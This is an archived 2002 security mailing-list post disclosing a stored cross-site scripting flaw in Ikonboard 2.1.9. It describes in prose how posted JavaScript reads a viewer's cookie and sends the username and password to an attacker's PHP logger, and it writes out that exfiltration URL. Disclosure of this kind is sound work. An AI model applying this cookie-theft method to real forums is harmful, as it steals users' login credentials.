Re: Ikonboard 2.1.9 (possible other versions) Vulnerability when HTML is ON

From: Stefan Walk (kyraelat_private)
Date: Wed Apr 24 2002 - 14:26:29 PDT

Next message: Marcell Fodor: "A bug in the Kerberos4 ftp client may cause heap overflow which leads to remote code execution"

Previous message: Wietse Venema: "Re: trusting user-supplied data (was Re: FreeBSD Security Advisory FreeBSD-SA-02:23.stdio)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hello! 
This is a vulnerability of Ikonboard 2.1.9 (possible other versions, probably all 2.x.x versions) when HTML is ON.
Everyone can post a script that allows him to save the username and password of everyone who views the post and has Javascript enabled.

The pw is stolen by 2 scripts:
1 php script on my server, call it grap.php. If this file is opened like
this: grap.php?user=STOLENUSERNAME&pass=STOLENPASSWORD, it saves user
and pass in a file on my server.
and:
1 javascript that is posted in the body of a post in the Ikonboard.
It reads the cookie, extracts the username out of the cookie into the
variable X , the password into the variable Y and opens a popup with the
location being http://www.myserver.com/grap.php?user=X&pass=Y. The php
script saves user and pass now.


Stefan Walk

Next message: Marcell Fodor: "A bug in the Kerberos4 ftp client may cause heap overflow which leads to remote code execution"
Previous message: Wietse Venema: "Re: trusting user-supplied data (was Re: FreeBSD Security Advisory FreeBSD-SA-02:23.stdio)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Apr 24 2002 - 15:29:24 PDT